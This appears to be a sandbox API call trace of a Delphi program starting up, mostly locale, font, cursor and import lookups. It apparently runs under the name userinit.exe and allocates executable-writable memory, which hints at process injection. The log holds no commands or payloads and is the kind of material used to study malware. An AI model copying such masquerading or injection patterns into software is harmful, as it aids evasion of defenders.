[0159.863] LoadStringA (in: hInstance=0x28e0000, uID=0xfff6, lpBuffer=0x24ef40, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0159.863] LoadStringA (in: hInstance=0x28e0000, uID=0xfff4, lpBuffer=0x24ef2c, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0159.863] LoadStringA (in: hInstance=0x28e0000, uID=0xffe4, lpBuffer=0x24ef2c, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0159.863] GetVersionExA (in: lpVersionInformation=0x24f2c4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x28e0000, dwMinorVersion=0x0, dwBuildNumber=0x28, dwPlatformId=0x65636341, szCSDVersion="ssibleObjectFromr<\x8e\x02·\"\x8e\x02\\ó$") | out: lpVersionInformation=0x24f2c4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0159.864] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0159.864] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0159.864] GetThreadLocale () returned 0x409
[0159.864] GetThreadLocale () returned 0x409
[0159.864] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x24f19c, cchData=256 | out: lpLCData="Jan") returned 4
[0159.864] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x24f19c, cchData=256 | out: lpLCData="January") returned 8
[0159.864] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x24f19c, cchData=256 | out: lpLCData="Feb") returned 4
[0159.864] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x24f19c, cchData=256 | out: lpLCData="February") returned 9
[0159.864] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x24f19c, cchData=256 | out: lpLCData="Mar") returned 4
[0159.864] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x24f19c, cchData=256 | out: lpLCData="March") returned 6
[0159.864] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x24f19c, cchData=256 | out: lpLCData="Apr") returned 4
[0159.864] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x24f19c, cchData=256 | out: lpLCData="April") returned 6
[0159.864] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x24f19c, cchData=256 | out: lpLCData="May") returned 4
[0159.864] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x24f19c, cchData=256 | out: lpLCData="May") returned 4
[0159.864] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x24f19c, cchData=256 | out: lpLCData="Jun") returned 4
[0159.864] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x24f19c, cchData=256 | out: lpLCData="June") returned 5
[0159.864] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x24f19c, cchData=256 | out: lpLCData="Jul") returned 4
[0159.864] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x24f19c, cchData=256 | out: lpLCData="July") returned 5
[0159.864] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x24f19c, cchData=256 | out: lpLCData="Aug") returned 4
[0159.864] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x24f19c, cchData=256 | out: lpLCData="August") returned 7
[0159.864] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x24f19c, cchData=256 | out: lpLCData="Sep") returned 4
[0159.864] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x24f19c, cchData=256 | out: lpLCData="September") returned 10
[0159.864] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x24f19c, cchData=256 | out: lpLCData="Oct") returned 4
[0159.864] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x24f19c, cchData=256 | out: lpLCData="October") returned 8
[0159.864] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x24f19c, cchData=256 | out: lpLCData="Nov") returned 4
[0159.864] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x24f19c, cchData=256 | out: lpLCData="November") returned 9
[0159.864] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x24f19c, cchData=256 | out: lpLCData="Dec") returned 4
[0159.864] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x24f19c, cchData=256 | out: lpLCData="December") returned 9
[0159.864] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x24f19c, cchData=256 | out: lpLCData="Sun") returned 4
[0159.864] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x24f19c, cchData=256 | out: lpLCData="Sunday") returned 7
[0159.864] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x24f19c, cchData=256 | out: lpLCData="Mon") returned 4
[0159.864] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x24f19c, cchData=256 | out: lpLCData="Monday") returned 7
[0159.864] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x24f19c, cchData=256 | out: lpLCData="Tue") returned 4
[0159.864] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x24f19c, cchData=256 | out: lpLCData="Tuesday") returned 8
[0159.864] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x24f19c, cchData=256 | out: lpLCData="Wed") returned 4
[0159.865] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x24f19c, cchData=256 | out: lpLCData="Wednesday") returned 10
[0159.865] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x24f19c, cchData=256 | out: lpLCData="Thu") returned 4
[0159.865] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x24f19c, cchData=256 | out: lpLCData="Thursday") returned 9
[0159.865] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x24f19c, cchData=256 | out: lpLCData="Fri") returned 4
[0159.865] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x24f19c, cchData=256 | out: lpLCData="Friday") returned 7
[0159.865] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x24f19c, cchData=256 | out: lpLCData="Sat") returned 4
[0159.865] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x24f19c, cchData=256 | out: lpLCData="Saturday") returned 9
[0159.865] GetThreadLocale () returned 0x409
[0159.865] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x24f1f8, cchData=256 | out: lpLCData="$") returned 2
[0159.865] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x24f1f8, cchData=256 | out: lpLCData="0") returned 2
[0159.865] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x24f1f8, cchData=256 | out: lpLCData="0") returned 2
[0159.865] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x24f2f0, cchData=2 | out: lpLCData=",") returned 2
[0159.865] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x24f2f0, cchData=2 | out: lpLCData=".") returned 2
[0159.865] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x24f1f8, cchData=256 | out: lpLCData="2") returned 2
[0159.865] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x24f2f0, cchData=2 | out: lpLCData="/") returned 2
[0159.865] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x24f1f8, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0159.865] GetThreadLocale () returned 0x409
[0159.865] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x24f1c4, cchData=256 | out: lpLCData="1") returned 2
[0159.865] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x24f1f8, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0159.865] GetThreadLocale () returned 0x409
[0159.865] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x24f1c4, cchData=256 | out: lpLCData="1") returned 2
[0159.865] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x24f2f0, cchData=2 | out: lpLCData=":") returned 2
[0159.865] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x24f1f8, cchData=256 | out: lpLCData="AM") returned 3
[0159.865] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x24f1f8, cchData=256 | out: lpLCData="PM") returned 3
[0159.865] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x24f1f8, cchData=256 | out: lpLCData="0") returned 2
[0159.865] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x24f1f8, cchData=256 | out: lpLCData="0") returned 2
[0159.865] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x24f1f8, cchData=256 | out: lpLCData="0") returned 2
[0159.865] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x24f2f0, cchData=2 | out: lpLCData=",") returned 2
[0159.865] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0159.865] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0159.866] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0159.866] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0159.866] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0159.866] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0159.866] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0159.866] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0159.866] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0159.866] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0159.866] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0159.866] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0159.866] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0159.866] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0159.867] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0159.867] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0159.867] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0159.867] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0159.867] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0159.867] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0159.867] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0159.867] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0159.867] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0159.867] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0xa8
[0159.867] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xa0
[0159.867] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xac
[0159.868] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0159.868] GetDC (hWnd=0x0) returned 0x480107e1
[0159.868] GetDeviceCaps (hdc=0x480107e1, index=90) returned 96
[0159.868] ReleaseDC (hWnd=0x0, hDC=0x480107e1) returned 1
[0159.868] GetDC (hWnd=0x0) returned 0x480107e1
[0159.868] GetDeviceCaps (hdc=0x480107e1, index=104) returned 0
[0159.868] ReleaseDC (hWnd=0x0, hDC=0x480107e1) returned 1
[0159.868] CreatePalette (plpal=0x24ef54) returned 0x4808086a
[0159.868] GetStockObject (i=7) returned 0x1b00017
[0159.868] GetStockObject (i=5) returned 0x1900015
[0159.868] GetStockObject (i=13) returned 0x18a002e
[0159.868] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0159.868] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0159.868] LoadStringA (in: hInstance=0x28e0000, uID=0xff3d, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0159.868] LoadStringA (in: hInstance=0x28e0000, uID=0xff3c, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0159.868] LoadStringA (in: hInstance=0x28e0000, uID=0xff3b, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0159.869] LoadStringA (in: hInstance=0x28e0000, uID=0xff3a, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0159.869] LoadStringA (in: hInstance=0x28e0000, uID=0xff39, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0159.869] LoadStringA (in: hInstance=0x28e0000, uID=0xff38, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0159.869] LoadStringA (in: hInstance=0x28e0000, uID=0xff37, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0159.869] LoadStringA (in: hInstance=0x28e0000, uID=0xff36, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0159.869] LoadStringA (in: hInstance=0x28e0000, uID=0xff35, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0159.869] LoadStringA (in: hInstance=0x28e0000, uID=0xff34, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0159.869] LoadStringA (in: hInstance=0x28e0000, uID=0xff33, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0159.869] LoadStringA (in: hInstance=0x28e0000, uID=0xff32, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0159.869] LoadStringA (in: hInstance=0x28e0000, uID=0xff31, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0159.869] LoadStringA (in: hInstance=0x28e0000, uID=0xff30, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0159.869] LoadStringA (in: hInstance=0x28e0000, uID=0xff4f, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0159.869] LoadStringA (in: hInstance=0x28e0000, uID=0xff4e, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0159.869] LoadStringA (in: hInstance=0x28e0000, uID=0xff4d, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0159.869] LoadStringA (in: hInstance=0x28e0000, uID=0xff4c, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0159.869] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0159.869] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0159.869] GetCurrentThreadId () returned 0x6e4
[0159.869] GlobalAddAtomA (lpString="WndProcPtr028E0000000006E4") returned 0xc113
[0159.870] LoadStringA (in: hInstance=0x28e0000, uID=0xfefc, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0159.870] LoadStringA (in: hInstance=0x28e0000, uID=0xfefb, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0159.870] LoadStringA (in: hInstance=0x28e0000, uID=0xfefa, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0159.870] LoadStringA (in: hInstance=0x28e0000, uID=0xfef9, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0159.870] LoadStringA (in: hInstance=0x28e0000, uID=0xfef8, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0159.870] LoadStringA (in: hInstance=0x28e0000, uID=0xfef7, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0159.870] LoadStringA (in: hInstance=0x28e0000, uID=0xfef6, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0159.870] LoadStringA (in: hInstance=0x28e0000, uID=0xfef5, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0159.870] LoadStringA (in: hInstance=0x28e0000, uID=0xfef4, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0159.870] LoadStringA (in: hInstance=0x28e0000, uID=0xfef3, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0159.870] LoadStringA (in: hInstance=0x28e0000, uID=0xfef2, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0159.870] LoadStringA (in: hInstance=0x28e0000, uID=0xfef1, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0159.870] LoadStringA (in: hInstance=0x28e0000, uID=0xfef0, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0159.870] LoadStringA (in: hInstance=0x28e0000, uID=0xff0f, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0159.870] LoadStringA (in: hInstance=0x28e0000, uID=0xff0e, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0159.870] LoadStringA (in: hInstance=0x28e0000, uID=0xff0d, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0159.870] LoadStringA (in: hInstance=0x28e0000, uID=0xff0c, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0159.870] LoadStringA (in: hInstance=0x28e0000, uID=0xff0b, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0159.870] LoadStringA (in: hInstance=0x28e0000, uID=0xff0a, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0159.870] LoadStringA (in: hInstance=0x28e0000, uID=0xff09, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0159.870] LoadStringA (in: hInstance=0x28e0000, uID=0xff08, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0159.870] LoadStringA (in: hInstance=0x28e0000, uID=0xff07, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0159.870] LoadStringA (in: hInstance=0x28e0000, uID=0xff06, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0159.870] LoadStringA (in: hInstance=0x28e0000, uID=0xff05, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0159.870] LoadStringA (in: hInstance=0x28e0000, uID=0xff04, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0159.871] LoadStringA (in: hInstance=0x28e0000, uID=0xff03, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0159.871] LoadStringA (in: hInstance=0x28e0000, uID=0xff02, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0159.871] LoadStringA (in: hInstance=0x28e0000, uID=0xff01, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0159.871] LoadStringA (in: hInstance=0x28e0000, uID=0xff00, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0159.871] LoadStringA (in: hInstance=0x28e0000, uID=0xff1f, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0159.871] LoadStringA (in: hInstance=0x28e0000, uID=0xff1e, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0159.871] LoadStringA (in: hInstance=0x28e0000, uID=0xff1d, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0159.871] LoadStringA (in: hInstance=0x28e0000, uID=0xff1c, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0159.871] LoadStringA (in: hInstance=0x28e0000, uID=0xff1b, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0159.871] LoadStringA (in: hInstance=0x28e0000, uID=0xff1a, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0159.871] LoadStringA (in: hInstance=0x28e0000, uID=0xff19, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0159.871] LoadStringA (in: hInstance=0x28e0000, uID=0xff18, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0159.871] LoadStringA (in: hInstance=0x28e0000, uID=0xff17, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0159.871] LoadStringA (in: hInstance=0x28e0000, uID=0xff16, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0159.871] LoadStringA (in: hInstance=0x28e0000, uID=0xff15, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0159.871] LoadStringA (in: hInstance=0x28e0000, uID=0xff14, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0159.871] LoadStringA (in: hInstance=0x28e0000, uID=0xff13, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0159.871] LoadStringA (in: hInstance=0x28e0000, uID=0xff12, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0159.871] LoadStringA (in: hInstance=0x28e0000, uID=0xff11, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0159.871] LoadStringA (in: hInstance=0x28e0000, uID=0xff10, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0159.871] LoadStringA (in: hInstance=0x28e0000, uID=0xff2f, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0159.871] LoadStringA (in: hInstance=0x28e0000, uID=0xff2e, lpBuffer=0x24ef50, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0159.871] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0159.871] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0159.871] GetVersion () returned 0x1db10106
[0159.871] GetCurrentProcessId () returned 0x174
[0159.871] GlobalAddAtomA (lpString="Delphi00000174") returned 0xc119
[0159.871] GetCurrentThreadId () returned 0x6e4
[0159.871] GlobalAddAtomA (lpString="ControlOfs028E0000000006E4") returned 0xc112
[0159.872] RegisterClipboardFormatA (lpszFormat="ControlOfs028E0000000006E4") returned 0xc17c
[0159.872] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0159.872] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0159.872] GetSystemMetrics (nIndex=19) returned 1
[0159.872] GetSystemMetrics (nIndex=75) returned 1
[0159.872] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x2a01320, fWinIni=0x0 | out: pvParam=0x2a01320) returned 1
[0159.872] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0159.872] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0159.872] LoadCursorA (hInstance=0x28e0000, lpCursorName=0x7ff9) returned 0x8020d
[0159.872] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0159.872] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0159.872] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0159.872] LoadCursorA (hInstance=0x28e0000, lpCursorName=0x7ffa) returned 0xa0201
[0159.872] LoadCursorA (hInstance=0x28e0000, lpCursorName=0x7ffb) returned 0xa01c5
[0159.873] LoadCursorA (hInstance=0x28e0000, lpCursorName=0x7ffc) returned 0xa01c1
[0159.873] LoadCursorA (hInstance=0x28e0000, lpCursorName=0x7ffd) returned 0xa01f3
[0159.873] LoadCursorA (hInstance=0x28e0000, lpCursorName=0x7fff) returned 0xc01a7
[0159.873] LoadCursorA (hInstance=0x28e0000, lpCursorName=0x7ffe) returned 0xc019d
[0159.873] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0159.873] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0159.873] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0159.873] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0159.873] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0159.873] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0159.873] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0159.874] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0159.874] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0159.874] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0159.874] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0159.874] GetDC (hWnd=0x0) returned 0x480107e1
[0159.874] GetDeviceCaps (hdc=0x480107e1, index=90) returned 96
[0159.874] ReleaseDC (hWnd=0x0, hDC=0x480107e1) returned 1
[0159.874] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0159.874] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x2939a60, dwData=0x2a0156c) returned 1
[0159.874] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x24f2bb, fWinIni=0x0 | out: pvParam=0x24f2bb) returned 1
[0159.874] CreateFontIndirectA (lplf=0x24f2bb) returned 0x200a0834
[0159.874] GetObjectA (in: h=0x200a0834, c=60, pv=0x24f0ac | out: pv=0x24f0ac) returned 60
[0159.874] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x24f167, fWinIni=0x0 | out: pvParam=0x24f167) returned 1
[0159.874] CreateFontIndirectA (lplf=0x24f243) returned 0x710a085e
[0159.874] GetObjectA (in: h=0x710a085e, c=60, pv=0x24f0ac | out: pv=0x24f0ac) returned 60
[0159.875] CreateFontIndirectA (lplf=0x24f207) returned 0x850a0881
[0159.875] GetObjectA (in: h=0x850a0881, c=60, pv=0x24f0ac | out: pv=0x24f0ac) returned 60
[0159.875] LoadIconA (hInstance=0x0, lpIconName="MAINICON") returned 0x0
[0159.875] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x24f21b, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0159.875] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0x24f21b | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0159.875] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x1f0000
[0159.875] GetKeyboardLayoutList (in: nBuff=64, lpList=0x24f19c | out: lpList=0x24f19c) returned 1
[0159.876] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0159.876] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0159.877] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6d7b0000
[0159.877] GetProcAddress (hModule=0x6d7b0000, lpProcName="InitializeFlatSB") returned 0x6d7e266f
[0159.877] GetProcAddress (hModule=0x6d7b0000, lpProcName="UninitializeFlatSB") returned 0x6d7e2542
[0159.877] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollProp") returned 0x6d7e1d29
[0159.877] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollProp") returned 0x6d7e238d
